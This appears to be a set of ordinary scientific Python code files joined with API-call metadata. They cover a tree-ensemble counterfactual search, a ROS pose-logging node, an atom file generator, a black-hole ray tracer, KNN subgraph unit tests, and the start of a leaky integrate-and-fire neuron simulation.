return esatisfactory def transam(ensemble_regressor, x, y_threshold, epsilon, cost_func): """ x: feature vector y_threshold: threshold value to select the positive path """ """ initialize """ x_out = copy.deepcopy(x) # initialize output delta_mini = 10**3 # initialize cost check_cnt = 0 # check whether epsilon satisfactory instance is updated for estimator in ensemble_regressor: if (ensemble_regressor.predict(x.reshape(1, -1)) < y_threshold and estimator.predict(x.reshape(1, -1)) < y_threshold): paths_info = search_path(estimator, y_threshold) for key in paths_info: """ generate epsilon-satisfactory instance """ path_info = paths_info[key] es_instance = esatisfactory_instance(x, epsilon, path_info) if ensemble_regressor.predict(es_instance.reshape(1, -1)) > y_threshold: if cost_func(x, es_instance) < delta_mini: x_out = es_instance delta_mini = cost_func(x, es_instance) check_cnt += 1 # add update counter else: continue return x_out
[ "copy.deepcopy", "numpy.where", "numpy.array", "numpy.unique" ]
[((3546, 3562), 'copy.deepcopy', 'copy.deepcopy', (['x'], {}), '(x)\n', (3559, 3562), False, 'import copy\n'), ((3586, 3617), 'numpy.unique', 'np.unique', (["path_info['feature']"], {}), "(path_info['feature'])\n", (3595, 3617), True, 'import numpy as np\n'), ((4761, 4777), 'copy.deepcopy', 'copy.deepcopy', (['x'], {}), '(x)\n', (4774, 4777), False, 'import copy\n'), ((758, 787), 'numpy.where', 'np.where', (['(children_left == -1)'], {}), '(children_left == -1)\n', (766, 787), True, 'import numpy as np\n'), ((3723, 3753), 'numpy.array', 'np.array', (["path_info['feature']"], {}), "(path_info['feature'])\n", (3731, 3753), True, 'import numpy as np\n'), ((1244, 1281), 'numpy.where', 'np.where', (['(children_left == child_node)'], {}), '(children_left == child_node)\n', (1252, 1281), True, 'import numpy as np\n'), ((1387, 1425), 'numpy.where', 'np.where', (['(children_right == child_node)'], {}), '(children_right == child_node)\n', (1395, 1425), True, 'import numpy as np\n'), ((1514, 1552), 'numpy.where', 'np.where', (['(children_right == child_node)'], {}), '(children_right == child_node)\n', (1522, 1552), True, 'import numpy as np\n'), ((1658, 1695), 'numpy.where', 'np.where', (['(children_left == child_node)'], {}), '(children_left == child_node)\n', (1666, 1695), True, 'import numpy as np\n')]
#!/usr/bin/env python2 from __future__ import print_function import roslib import sys import rospy import numpy as np import datetime import time import os import pickle from geometry_msgs.msg import PoseArray from geometry_msgs.msg import Pose from geometry_msgs.msg import PoseWithCovariance from std_msgs.msg import Bool from nav_msgs.msg import Odometry from dse_msgs.msg import PoseMarkers from std_msgs.msg import Float64MultiArray from std_msgs.msg import MultiArrayLayout from std_msgs.msg import MultiArrayDimension from dse_msgs.msg import InfFilterResults from visualization_msgs.msg import Marker from scipy.spatial.transform import Rotation as R from gazebo_msgs.msg import LinkStates import tf_conversions import tf2_ros import matplotlib.pyplot as plt import gazebo_lib import dse_lib import dse_constants roslib.load_manifest('dse_simulation') class information_filter: # Define initial/setup values def __init__(self): self.time = [] self.true_poses = [] self.est_poses = [] self.est_covariances = [] # # Get parameters from launch file # self.ros_prefix = rospy.get_param('~prefix') # if len(self.ros_prefix) != 0 and self.ros_prefix[0] != '/': # self.ros_prefix = '/' + self.ros_prefix # self.tf_pretix = self.ros_prefix[1:] # self.dim_state = rospy.get_param('~dim_state') # Get parameters from launch file # self.n_params = 3 # self.dim_state = 6 # self.object_names = ['tb3_0', 'tb3_1', 'tb3_2'] # self.object_ids = [5, 6, 7] # self.agent_ids = [5, 6, 7] # self.dim_state = 6 self.object_names = rospy.get_param('~objects') self.object_ids = rospy.get_param('~object_ids') self.agent_ids = rospy.get_param('~agent_ids') self.dim_state = rospy.get_param('~dim_state', 6) n_params = len(self.agent_ids) self.store_data_sub = rospy.Subscriber('/store_data', Bool, self.store_data) self.gazebo_model_object = gazebo_lib.GazeboModel(self.object_names) self.inf_results_subs = [] self.agent_names = [] for i in range(n_params): index = self.object_ids.index(self.agent_ids[i]) self.agent_names.append(self.object_names[index]) if len(self.agent_names[i]) != 0 and self.agent_names[i][0] != '/': self.agent_names[i] = '/' + self.agent_names[i] self.inf_results_subs.append(rospy.Subscriber( self.agent_names[i] + "/dse/inf/results", InfFilterResults, self.results_callback, i)) self.time.append([]) self.true_poses.append([]) self.est_poses.append([]) self.est_covariances.append([]) if self.dim_state == 6: self.dim_obs = 3 elif self.dim_state == 12: self.dim_obs = 6 else: rospy.signal_shutdown('invalid state dimension passed in') # Create pose_array for the information results def results_callback(self, data, agent_index): inf_id_list = np.array(data.ids) inf_Y = dse_lib.multi_array_2d_output(data.inf_matrix) inf_y = dse_lib.multi_array_2d_output(data.inf_vector) self.inf_x = np.linalg.inv(inf_Y).dot(inf_y) inf_P = np.linalg.inv(inf_Y) est_pose = [] true_pose = [] est_covariance = [] for id in inf_id_list: name_index = self.object_ids.index(id) name = self.object_names[name_index] i = np.where(inf_id_list == id)[0][0] i_min = i * self.dim_state i_max = i_min + self.dim_state this_pose = dse_lib.pose_from_state_3D(self.inf_x[i_min:i_max]) this_xyy = dse_lib.state_to_xyzypr(dse_lib.state_from_pose_3D(this_pose)) # if this_xyy[2] - 1.5707633 < 0.0001: # print('weird error') est_pose.append(this_xyy) cov = dse_lib.sub_matrix(inf_P, inf_id_list, id, self.dim_state) cov = dse_lib.state_cov_to_covariance_matrix(cov) est_covariance.append(cov) this_pose = self.gazebo_model_object.get_model_pose(name) this_xyy = dse_lib.state_to_xyzypr(dse_lib.state_from_pose_3D(this_pose)) true_pose.append(this_xyy) if len(self.est_poses[agent_index]) > 1 and np.linalg.norm(np.array(est_pose) - self.est_poses[agent_index][-1]) > 1: print('error') # for est in est_pose: # if np.allclose(est, [-2, 0, np.pi/2]) or np.allclose(est, [0, 0, np.pi/2]) or np.allclose(est, [2, 0, np.pi/2]): # print('error') time = rospy.Time.now().secs + rospy.Time.now().nsecs / 1000000000 self.time[agent_index].append(time) self.true_poses[agent_index].append(np.array(true_pose)) self.est_poses[agent_index].append(np.array(est_pose)) # if est_pose[1][2] - 1.5707633 < 0.0001: # print('weird error') self.est_covariances[agent_index].append(est_covariance) def store_data(self, data): if data.data: time_np = [] true_poses_np = [] est_poses_np = [] est_covariances_np = [] for i in range(len(self.agent_ids)): time_np.append(np.array(self.time[i])) true_poses_np.append(np.array(self.true_poses[i])) est_poses_np.append(np.array(self.est_poses[i])) est_covariances_np.append(np.array(self.est_covariances[i])) header = '[header, time, object_ids, object_names, agent_names, agent_ids, true_poses, est_poses, est_covariances]' cal = [header, time_np, self.object_ids, self.object_names, self.agent_names, self.agent_ids, true_poses_np, est_poses_np, est_covariances_np] dump_file = "simulation_data_" + str(rospy.Time.now()) + ".p" pickle.dump(cal, open(os.path.join(sys.path[0], dump_file), "wb")) def main(args): rospy.init_node('dse_plotting_node', anonymous=True) imf = information_filter() try: rospy.spin() except KeyboardInterrupt: print("Shutting down") if __name__ == '__main__': main(sys.argv)
[ "dse_lib.pose_from_state_3D", "dse_lib.sub_matrix", "rospy.Subscriber", "rospy.Time.now", "os.path.join", "dse_lib.state_from_pose_3D", "rospy.signal_shutdown", "rospy.get_param", "roslib.load_manifest", "numpy.where", "numpy.array", "rospy.init_node", "numpy.linalg.inv", "rospy.spin", "gazebo_lib.GazeboModel", "dse_lib.multi_array_2d_output", "dse_lib.state_cov_to_covariance_matrix" ]
[((822, 860), 'roslib.load_manifest', 'roslib.load_manifest', (['"""dse_simulation"""'], {}), "('dse_simulation')\n", (842, 860), False, 'import roslib\n'), ((6055, 6107), 'rospy.init_node', 'rospy.init_node', (['"""dse_plotting_node"""'], {'anonymous': '(True)'}), "('dse_plotting_node', anonymous=True)\n", (6070, 6107), False, 'import rospy\n'), ((1681, 1708), 'rospy.get_param', 'rospy.get_param', (['"""~objects"""'], {}), "('~objects')\n", (1696, 1708), False, 'import rospy\n'), ((1735, 1765), 'rospy.get_param', 'rospy.get_param', (['"""~object_ids"""'], {}), "('~object_ids')\n", (1750, 1765), False, 'import rospy\n'), ((1791, 1820), 'rospy.get_param', 'rospy.get_param', (['"""~agent_ids"""'], {}), "('~agent_ids')\n", (1806, 1820), False, 'import rospy\n'), ((1846, 1878), 'rospy.get_param', 'rospy.get_param', (['"""~dim_state"""', '(6)'], {}), "('~dim_state', 6)\n", (1861, 1878), False, 'import rospy\n'), ((1949, 2003), 'rospy.Subscriber', 'rospy.Subscriber', (['"""/store_data"""', 'Bool', 'self.store_data'], {}), "('/store_data', Bool, self.store_data)\n", (1965, 2003), False, 'import rospy\n'), ((2040, 2081), 'gazebo_lib.GazeboModel', 'gazebo_lib.GazeboModel', (['self.object_names'], {}), '(self.object_names)\n', (2062, 2081), False, 'import gazebo_lib\n'), ((3104, 3122), 'numpy.array', 'np.array', (['data.ids'], {}), '(data.ids)\n', (3112, 3122), True, 'import numpy as np\n'), ((3139, 3185), 'dse_lib.multi_array_2d_output', 'dse_lib.multi_array_2d_output', (['data.inf_matrix'], {}), '(data.inf_matrix)\n', (3168, 3185), False, 'import dse_lib\n'), ((3202, 3248), 'dse_lib.multi_array_2d_output', 'dse_lib.multi_array_2d_output', (['data.inf_vector'], {}), '(data.inf_vector)\n', (3231, 3248), False, 'import dse_lib\n'), ((3318, 3338), 'numpy.linalg.inv', 'np.linalg.inv', (['inf_Y'], {}), '(inf_Y)\n', (3331, 3338), True, 'import numpy as np\n'), ((6156, 6168), 'rospy.spin', 'rospy.spin', ([], {}), '()\n', (6166, 6168), False, 'import rospy\n'), ((3702, 3753), 'dse_lib.pose_from_state_3D', 'dse_lib.pose_from_state_3D', (['self.inf_x[i_min:i_max]'], {}), '(self.inf_x[i_min:i_max])\n', (3728, 3753), False, 'import dse_lib\n'), ((3987, 4045), 'dse_lib.sub_matrix', 'dse_lib.sub_matrix', (['inf_P', 'inf_id_list', 'id', 'self.dim_state'], {}), '(inf_P, inf_id_list, id, self.dim_state)\n', (4005, 4045), False, 'import dse_lib\n'), ((4064, 4107), 'dse_lib.state_cov_to_covariance_matrix', 'dse_lib.state_cov_to_covariance_matrix', (['cov'], {}), '(cov)\n', (4102, 4107), False, 'import dse_lib\n'), ((4852, 4871), 'numpy.array', 'np.array', (['true_pose'], {}), '(true_pose)\n', (4860, 4871), True, 'import numpy as np\n'), ((4916, 4934), 'numpy.array', 'np.array', (['est_pose'], {}), '(est_pose)\n', (4924, 4934), True, 'import numpy as np\n'), ((2491, 2597), 'rospy.Subscriber', 'rospy.Subscriber', (["(self.agent_names[i] + '/dse/inf/results')", 'InfFilterResults', 'self.results_callback', 'i'], {}), "(self.agent_names[i] + '/dse/inf/results', InfFilterResults,\n self.results_callback, i)\n", (2507, 2597), False, 'import rospy\n'), ((2919, 2977), 'rospy.signal_shutdown', 'rospy.signal_shutdown', (['"""invalid state dimension passed in"""'], {}), "('invalid state dimension passed in')\n", (2940, 2977), False, 'import rospy\n'), ((3270, 3290), 'numpy.linalg.inv', 'np.linalg.inv', (['inf_Y'], {}), '(inf_Y)\n', (3283, 3290), True, 'import numpy as np\n'), ((3801, 3838), 'dse_lib.state_from_pose_3D', 'dse_lib.state_from_pose_3D', (['this_pose'], {}), '(this_pose)\n', (3827, 3838), False, 'import dse_lib\n'), ((4264, 4301), 'dse_lib.state_from_pose_3D', 'dse_lib.state_from_pose_3D', (['this_pose'], {}), '(this_pose)\n', (4290, 4301), False, 'import dse_lib\n'), ((4704, 4720), 'rospy.Time.now', 'rospy.Time.now', ([], {}), '()\n', (4718, 4720), False, 'import rospy\n'), ((3561, 3588), 'numpy.where', 'np.where', (['(inf_id_list == id)'], {}), '(inf_id_list == id)\n', (3569, 3588), True, 'import numpy as np\n'), ((4728, 4744), 'rospy.Time.now', 'rospy.Time.now', ([], {}), '()\n', (4742, 4744), False, 'import rospy\n'), ((5343, 5365), 'numpy.array', 'np.array', (['self.time[i]'], {}), '(self.time[i])\n', (5351, 5365), True, 'import numpy as np\n'), ((5404, 5432), 'numpy.array', 'np.array', (['self.true_poses[i]'], {}), '(self.true_poses[i])\n', (5412, 5432), True, 'import numpy as np\n'), ((5470, 5497), 'numpy.array', 'np.array', (['self.est_poses[i]'], {}), '(self.est_poses[i])\n', (5478, 5497), True, 'import numpy as np\n'), ((5541, 5574), 'numpy.array', 'np.array', (['self.est_covariances[i]'], {}), '(self.est_covariances[i])\n', (5549, 5574), True, 'import numpy as np\n'), ((5987, 6023), 'os.path.join', 'os.path.join', (['sys.path[0]', 'dump_file'], {}), '(sys.path[0], dump_file)\n', (5999, 6023), False, 'import os\n'), ((4410, 4428), 'numpy.array', 'np.array', (['est_pose'], {}), '(est_pose)\n', (4418, 4428), True, 'import numpy as np\n'), ((5928, 5944), 'rospy.Time.now', 'rospy.Time.now', ([], {}), '()\n', (5942, 5944), False, 'import rospy\n')]
import numpy as np class Atom: def __init__(self, x, y, z): self.x = x self.y = y self.z = z self.type = 1 self.vx = 0.0 self.vy = 0.0 self.vz = 0.0 def save_file(filename, atoms, lo, hi): with open(filename, "w") as f: f.write("Position Data\n\n") f.write("{} atoms\n".format(len(atoms))) f.write("1 atom types\n\n") f.write(f"{lo} {hi} xlo xhi\n") f.write(f"{lo} {hi} ylo yhi\n") f.write(f"{lo} {hi} zlo zhi\n") f.write("\n") f.write("Atoms\n\n") for i, a in enumerate(atoms): f.write("{} {} {} {} {}\n".format(i+1, a.type, a.x, a.y, a.z)) f.write("\n") f.write("Velocities\n\n") for i, a in enumerate(atoms): f.write("{} {} {} {}\n".format(i+1, a.vx, a.vy, a.vz)) print("Generated {}".format(filename)) if __name__ == "__main__": lo = -10 hi = 30 atoms = [] for x in np.arange(lo, hi, 1): atoms.append(Atom(x, 0, 0)) save_file("test.atoms", atoms, lo, hi)
[ "numpy.arange" ]
[((1017, 1037), 'numpy.arange', 'np.arange', (['lo', 'hi', '(1)'], {}), '(lo, hi, 1)\n', (1026, 1037), True, 'import numpy as np\n')]
import numpy as np import matplotlib.pyplot as plt from glsl_helpers import * degtorad = lambda a: a / 180.0 * np.pi def smooth_step(x, threshold, steepness): return 1.0 / (1.0 + exp(-(x - threshold) * steepness)) def trace_u(pos, ray, path): n_steps = path.shape[0] u0 = 1.0 / length(pos) u = u0 normal_vec = normalize(pos) tangent_vec = normalize(cross(cross(normal_vec, ray), normal_vec)) du = -dot(ray, normal_vec) / dot(ray, tangent_vec) * u du0 = du theta = 0 t = 0 ddu = 0 MAX_REVOLUTIONS = 2 theta_step = 2.0 * M_PI * MAX_REVOLUTIONS / float(n_steps) for j in range(n_steps): max_rel_u_change = (1 - log(u)) * 10.0 / float(n_steps) step = theta_step if (du > 0 or (du0 < 0.0 and u0 / u < 5.0)) and abs(du) > abs(max_rel_u_change * u) / theta_step: step = max_rel_u_change * u / abs(du) path[j, 0:3] = pos path[j, 3] = t u += du * step ddu = -u * (1.0 - 1.5 * u * u) du += ddu * step if u < 0.0: break if u < 1.0: dt = sqrt(du * du + u * u * (1.0 - u)) / (u * u * (1.0 - u)) * step theta += step old_pos = pos pos = (cos(theta) * normal_vec + sin(theta) * tangent_vec) / u if u > 1.0: break mix = smooth_step(1.0 / u, 8.0, 2.0) dt = mix * length(pos - old_pos) + (1.0 - mix) * dt t += dt def path_r(path): return np.sqrt(np.sum(path[:, 0:3] * path[:, 0:3], 1)) def path_x(path): return path[:, 0] def path_y(path): return path[:, 1] def path_time(path): return path[:, 3] def path_arc_length(path): return np.hstack(([0], np.cumsum(path_r(path[1:] - path[:-1])))) def path_angle(path): angles = np.zeros(path[:, 0].shape) + np.nan diffs = path[1:] - path[:-1] angles[:-1] = np.arctan2(diffs[:, 1], diffs[:, 0]) return angles def get_first_non_nas(array): nas = np.where(np.logical_not(np.isfinite(array)))[0] if nas.size == 0 or nas[0] == 0: return array return array[:nas[0]] def last_cont_non_na(array): array = get_first_non_nas(array) if array.size == 0: return np.nan return array[-1] def crossing_func(path, x_func, y_func, threshold): x = get_first_non_nas(x_func(path)) y = get_first_non_nas(y_func(path)) if x.size < 2 or y.size < 2: return np.nan ins = np.where(y < threshold)[0] if ins.size == 0 or ins[0] == 0: return np.nan i1 = ins[0] i0 = i1 - 1 return np.interp(threshold, [y[i1], y[i0]], [x[i1], x[i0]]) def ball_entry_time(path, radius): return crossing_func(path, path_time, path_r, radius) def ball_entry_dist(path, radius): return crossing_func(path, path_arc_length, path_r, radius) def last_angle(path): return last_cont_non_na(path_angle(path)) def deflection_angle(path): if last_cont_non_na(path_r(path)) < 2.0: return np.nan return last_angle(path) - path_angle(path)[0] class PlotParams: def __init__(self, **kwargs): self.solver_func = trace_u self.n_steps = 500 self.angle = 30 self.x0 = -4 self.plot = True self.plot_scale = 5 self.plot_xlim = None self.plot_ylim = None self.plot_x = path_x self.plot_y = path_y self.plot_args = {} def set_params(self, **kwargs): for param, value in kwargs.items(): setattr(self, param, value) def trace_ray(ray=None, **kwargs): if ray is None: ray = PlotParams() ray.set_params(**kwargs) path = np.zeros((ray.n_steps, 4)) + np.nan a = degtorad(ray.angle) pos0 = (ray.x0, 0, 0) ray_dir = (np.cos(a), np.sin(a), 0) pos = np.ravel(pos0).T * 1.0 ray_dir = np.ravel(ray_dir).T * 1.0 ray.solver_func(pos, ray_dir, path) if ray.plot is True: plt.plot(ray.plot_x(path), ray.plot_y(path), **ray.plot_args) if ray.plot_scale is not None: plt.xlim([-ray.plot_scale, ray.plot_scale]) plt.ylim([-ray.plot_scale, ray.plot_scale]) if ray.plot_xlim is not None: plt.xlim(ray.plot_xlim) if ray.plot_ylim is not None: plt.ylim(ray.plot_ylim) return path def trace_rays(n_rays=1, **kwargs): agg_xy = np.zeros((n_rays, 2)) + np.nan for j in range(n_rays): ray = PlotParams() ray.aggregate_plot_x = None ray.set_params(**kwargs) ray.idx = j ray.rel = (j + 1) / float(n_rays) yield (ray) path = trace_ray(ray) if ray.aggregate_plot_x is not None: agg_xy[j, 0] = ray.aggregate_plot_x(path) agg_xy[j, 1] = ray.aggregate_plot_y(path) if ray.aggregate_plot_x is not None: if ray.plot is True: plt.show() plt.plot(agg_xy[:, 0], agg_xy[:, 1]) #trace_rays()
[ "matplotlib.pyplot.xlim", "numpy.arctan2", "numpy.sum", "matplotlib.pyplot.plot", "numpy.ravel", "matplotlib.pyplot.ylim", "matplotlib.pyplot.show", "numpy.zeros", "numpy.isfinite", "numpy.where", "numpy.sin", "numpy.cos", "numpy.interp" ]
[((1837, 1873), 'numpy.arctan2', 'np.arctan2', (['diffs[:, 1]', 'diffs[:, 0]'], {}), '(diffs[:, 1], diffs[:, 0])\n', (1847, 1873), True, 'import numpy as np\n'), ((2498, 2550), 'numpy.interp', 'np.interp', (['threshold', '[y[i1], y[i0]]', '[x[i1], x[i0]]'], {}), '(threshold, [y[i1], y[i0]], [x[i1], x[i0]])\n', (2507, 2550), True, 'import numpy as np\n'), ((1458, 1496), 'numpy.sum', 'np.sum', (['(path[:, 0:3] * path[:, 0:3])', '(1)'], {}), '(path[:, 0:3] * path[:, 0:3], 1)\n', (1464, 1496), True, 'import numpy as np\n'), ((1750, 1776), 'numpy.zeros', 'np.zeros', (['path[:, 0].shape'], {}), '(path[:, 0].shape)\n', (1758, 1776), True, 'import numpy as np\n'), ((2377, 2400), 'numpy.where', 'np.where', (['(y < threshold)'], {}), '(y < threshold)\n', (2385, 2400), True, 'import numpy as np\n'), ((3554, 3580), 'numpy.zeros', 'np.zeros', (['(ray.n_steps, 4)'], {}), '((ray.n_steps, 4))\n', (3562, 3580), True, 'import numpy as np\n'), ((3660, 3669), 'numpy.cos', 'np.cos', (['a'], {}), '(a)\n', (3666, 3669), True, 'import numpy as np\n'), ((3671, 3680), 'numpy.sin', 'np.sin', (['a'], {}), '(a)\n', (3677, 3680), True, 'import numpy as np\n'), ((4240, 4261), 'numpy.zeros', 'np.zeros', (['(n_rays, 2)'], {}), '((n_rays, 2))\n', (4248, 4261), True, 'import numpy as np\n'), ((4752, 4788), 'matplotlib.pyplot.plot', 'plt.plot', (['agg_xy[:, 0]', 'agg_xy[:, 1]'], {}), '(agg_xy[:, 0], agg_xy[:, 1])\n', (4760, 4788), True, 'import matplotlib.pyplot as plt\n'), ((3696, 3710), 'numpy.ravel', 'np.ravel', (['pos0'], {}), '(pos0)\n', (3704, 3710), True, 'import numpy as np\n'), ((3733, 3750), 'numpy.ravel', 'np.ravel', (['ray_dir'], {}), '(ray_dir)\n', (3741, 3750), True, 'import numpy as np\n'), ((3948, 3991), 'matplotlib.pyplot.xlim', 'plt.xlim', (['[-ray.plot_scale, ray.plot_scale]'], {}), '([-ray.plot_scale, ray.plot_scale])\n', (3956, 3991), True, 'import matplotlib.pyplot as plt\n'), ((4004, 4047), 'matplotlib.pyplot.ylim', 'plt.ylim', (['[-ray.plot_scale, ray.plot_scale]'], {}), '([-ray.plot_scale, ray.plot_scale])\n', (4012, 4047), True, 'import matplotlib.pyplot as plt\n'), ((4086, 4109), 'matplotlib.pyplot.xlim', 'plt.xlim', (['ray.plot_xlim'], {}), '(ray.plot_xlim)\n', (4094, 4109), True, 'import matplotlib.pyplot as plt\n'), ((4148, 4171), 'matplotlib.pyplot.ylim', 'plt.ylim', (['ray.plot_ylim'], {}), '(ray.plot_ylim)\n', (4156, 4171), True, 'import matplotlib.pyplot as plt\n'), ((4733, 4743), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (4741, 4743), True, 'import matplotlib.pyplot as plt\n'), ((1958, 1976), 'numpy.isfinite', 'np.isfinite', (['array'], {}), '(array)\n', (1969, 1976), True, 'import numpy as np\n')]
import numpy as np from opfython.math import distance from opfython.stream import loader, parser from opfython.subgraphs import knn csv = loader.load_csv('data/boat.csv') X, Y = parser.parse_loader(csv) def test_knn_subgraph_n_clusters(): subgraph = knn.KNNSubgraph(X, Y) assert subgraph.n_clusters == 0 def test_knn_subgraph_n_clusters_setter(): subgraph = knn.KNNSubgraph(X, Y) try: subgraph.n_clusters = 0.5 except: subgraph.n_clusters = 1 assert subgraph.n_clusters == 1 try: subgraph.n_clusters = -1 except: subgraph.n_clusters = 1 assert subgraph.n_clusters == 1 def test_knn_subgraph_best_k(): subgraph = knn.KNNSubgraph(X, Y) assert subgraph.best_k == 0 def test_knn_subgraph_best_k_setter(): subgraph = knn.KNNSubgraph(X, Y) try: subgraph.best_k = 0.5 except: subgraph.best_k = 1 assert subgraph.best_k == 1 try: subgraph.best_k = -1 except: subgraph.best_k = 1 assert subgraph.best_k == 1 def test_knn_subgraph_constant(): subgraph = knn.KNNSubgraph(X, Y) assert subgraph.constant == 0.0 def test_knn_subgraph_constant_setter(): subgraph = knn.KNNSubgraph(X, Y) try: subgraph.constant = 'a' except: subgraph.constant = 2.5 assert subgraph.constant == 2.5 def test_knn_subgraph_density(): subgraph = knn.KNNSubgraph(X, Y) assert subgraph.density == 0.0 def test_knn_subgraph_density_setter(): subgraph = knn.KNNSubgraph(X, Y) try: subgraph.density = 'a' except: subgraph.density = 2.5 assert subgraph.density == 2.5 def test_knn_subgraph_min_density(): subgraph = knn.KNNSubgraph(X, Y) assert subgraph.min_density == 0.0 def test_knn_subgraph_min_density_setter(): subgraph = knn.KNNSubgraph(X, Y) try: subgraph.min_density = 'a' except: subgraph.min_density = 2.5 assert subgraph.min_density == 2.5 def test_knn_subgraph_max_density(): subgraph = knn.KNNSubgraph(X, Y) assert subgraph.max_density == 0.0 def test_knn_subgraph_max_density_setter(): subgraph = knn.KNNSubgraph(X, Y) try: subgraph.max_density = 'a' except: subgraph.max_density = 2.5 assert subgraph.max_density == 2.5 def test_knn_subgraph_calculate_pdf(): subgraph = knn.KNNSubgraph(X, Y) distances = np.ones((100, 100)) subgraph.create_arcs(1, distance.euclidean_distance, pre_computed_distance=True, pre_distances=distances) subgraph.calculate_pdf(1, distance.euclidean_distance, pre_computed_distance=True, pre_distances=distances) subgraph.create_arcs(1, distance.euclidean_distance) subgraph.calculate_pdf(1, distance.euclidean_distance) assert subgraph.min_density != 0 assert subgraph.max_density != 0 def test_knn_subgraph_create_arcs(): subgraph = knn.KNNSubgraph(X, Y) distances = np.ones((100, 100)) distances.fill(0.000001) subgraph.create_arcs(1, distance.euclidean_distance, pre_computed_distance=True, pre_distances=distances) max_distances = subgraph.create_arcs(1, distance.euclidean_distance) assert len(max_distances) == 1 def test_knn_subgraph_eliminate_maxima_height(): subgraph = knn.KNNSubgraph(X, Y) subgraph.eliminate_maxima_height(2.5) assert subgraph.nodes[0].cost == 0
[ "opfython.subgraphs.knn.KNNSubgraph", "opfython.stream.parser.parse_loader", "numpy.ones", "opfython.stream.loader.load_csv" ]
[((140, 172), 'opfython.stream.loader.load_csv', 'loader.load_csv', (['"""data/boat.csv"""'], {}), "('data/boat.csv')\n", (155, 172), False, 'from opfython.stream import loader, parser\n'), ((180, 204), 'opfython.stream.parser.parse_loader', 'parser.parse_loader', (['csv'], {}), '(csv)\n', (199, 204), False, 'from opfython.stream import loader, parser\n'), ((258, 279), 'opfython.subgraphs.knn.KNNSubgraph', 'knn.KNNSubgraph', (['X', 'Y'], {}), '(X, Y)\n', (273, 279), False, 'from opfython.subgraphs import knn\n'), ((377, 398), 'opfython.subgraphs.knn.KNNSubgraph', 'knn.KNNSubgraph', (['X', 'Y'], {}), '(X, Y)\n', (392, 398), False, 'from opfython.subgraphs import knn\n'), ((697, 718), 'opfython.subgraphs.knn.KNNSubgraph', 'knn.KNNSubgraph', (['X', 'Y'], {}), '(X, Y)\n', (712, 718), False, 'from opfython.subgraphs import knn\n'), ((808, 829), 'opfython.subgraphs.knn.KNNSubgraph', 'knn.KNNSubgraph', (['X', 'Y'], {}), '(X, Y)\n', (823, 829), False, 'from opfython.subgraphs import knn\n'), ((1110, 1131), 'opfython.subgraphs.knn.KNNSubgraph', 'knn.KNNSubgraph', (['X', 'Y'], {}), '(X, Y)\n', (1125, 1131), False, 'from opfython.subgraphs import knn\n'), ((1227, 1248), 'opfython.subgraphs.knn.KNNSubgraph', 'knn.KNNSubgraph', (['X', 'Y'], {}), '(X, Y)\n', (1242, 1248), False, 'from opfython.subgraphs import knn\n'), ((1422, 1443), 'opfython.subgraphs.knn.KNNSubgraph', 'knn.KNNSubgraph', (['X', 'Y'], {}), '(X, Y)\n', (1437, 1443), False, 'from opfython.subgraphs import knn\n'), ((1537, 1558), 'opfython.subgraphs.knn.KNNSubgraph', 'knn.KNNSubgraph', (['X', 'Y'], {}), '(X, Y)\n', (1552, 1558), False, 'from opfython.subgraphs import knn\n'), ((1733, 1754), 'opfython.subgraphs.knn.KNNSubgraph', 'knn.KNNSubgraph', (['X', 'Y'], {}), '(X, Y)\n', (1748, 1754), False, 'from opfython.subgraphs import knn\n'), ((1856, 1877), 'opfython.subgraphs.knn.KNNSubgraph', 'knn.KNNSubgraph', (['X', 'Y'], {}), '(X, Y)\n', (1871, 1877), False, 'from opfython.subgraphs import knn\n'), ((2064, 2085), 'opfython.subgraphs.knn.KNNSubgraph', 'knn.KNNSubgraph', (['X', 'Y'], {}), '(X, Y)\n', (2079, 2085), False, 'from opfython.subgraphs import knn\n'), ((2187, 2208), 'opfython.subgraphs.knn.KNNSubgraph', 'knn.KNNSubgraph', (['X', 'Y'], {}), '(X, Y)\n', (2202, 2208), False, 'from opfython.subgraphs import knn\n'), ((2397, 2418), 'opfython.subgraphs.knn.KNNSubgraph', 'knn.KNNSubgraph', (['X', 'Y'], {}), '(X, Y)\n', (2412, 2418), False, 'from opfython.subgraphs import knn\n'), ((2436, 2455), 'numpy.ones', 'np.ones', (['(100, 100)'], {}), '((100, 100))\n', (2443, 2455), True, 'import numpy as np\n'), ((2977, 2998), 'opfython.subgraphs.knn.KNNSubgraph', 'knn.KNNSubgraph', (['X', 'Y'], {}), '(X, Y)\n', (2992, 2998), False, 'from opfython.subgraphs import knn\n'), ((3016, 3035), 'numpy.ones', 'np.ones', (['(100, 100)'], {}), '((100, 100))\n', (3023, 3035), True, 'import numpy as np\n'), ((3378, 3399), 'opfython.subgraphs.knn.KNNSubgraph', 'knn.KNNSubgraph', (['X', 'Y'], {}), '(X, Y)\n', (3393, 3399), False, 'from opfython.subgraphs import knn\n')]
from matplotlib import cm, rcParams import matplotlib.pyplot as plt import matplotlib.colors as colors import matplotlib as matplotlib import numpy as np import math as math import random as rand import os, sys, csv import pandas as pd #matplotlib.pyplot.xkcd(scale=.5, length=100, randomness=2) c = ['#aa3863', '#d97020', '#ef9f07', '#449775', '#3b7d86', '#5443a3'] # red, orange, yellow, green, blue, purple dW1, dW2, dW3 = 0, 0 ,0 np.random.seed() #42 def lif_euler(dt, v1, v2, I1, I2): return [v1 + dt*(-v1 + gamma*(v2-v1) + I1) , v2 + dt*(-v2 + gamma*(v1-v2) + I2) ] def lif_euler_stoch(dt, v1, v2, I1, I2, s1, s2, s3): global dW1, dW2, dW3 dW1 = s1*math.sqrt(dt)*np.random.randn() dW2 = s2*math.sqrt(dt)*np.random.randn() dW3 = s3*math.sqrt(dt)*np.random.randn() return [v1 + dt*(-v1 + gamma*(v2-v1) + I1) + dW1 + dW3, v2 + dt*(-v2 + gamma*(v1-v2) + I2) + dW2 + dW3] def correlations(sigma1, sigma2, sigma3, nb_iterations=1000) : phis = [] for k in range(nb_iterations) : #v1_0, v2_0 = 0.7611728117817528, 0.1654125684129333 # Used XPPAUT to find ideal initial conditions s.t. we begin in antiphase with I = 1.4 v1_0, v2_0 = 0.3764002759711251, 0.8546679415731656 x1, x2 = [v1_0], [v2_0] t = [0] nb_spikes = 0 I_baseline = 1.5 I1, I2 = [I_baseline], [I_baseline] pulse_start, pulse_duration = 0, 0.2 begin_pulse = True while t[-1] < maxtime : t.append(t[-1]+dt) if nb_spikes == 10 and begin_pulse : pulse_start = t[-1] begin_pulse = False if nb_spikes >= 10 and t[-1] < pulse_start + pulse_duration : next_values= lif_euler_stoch(dt, x1[-1], x2[-1], I1[-1], I2[-1], sigma1, sigma2, sigma3) I1.append(I_baseline + (dW1+dW3)/dt) 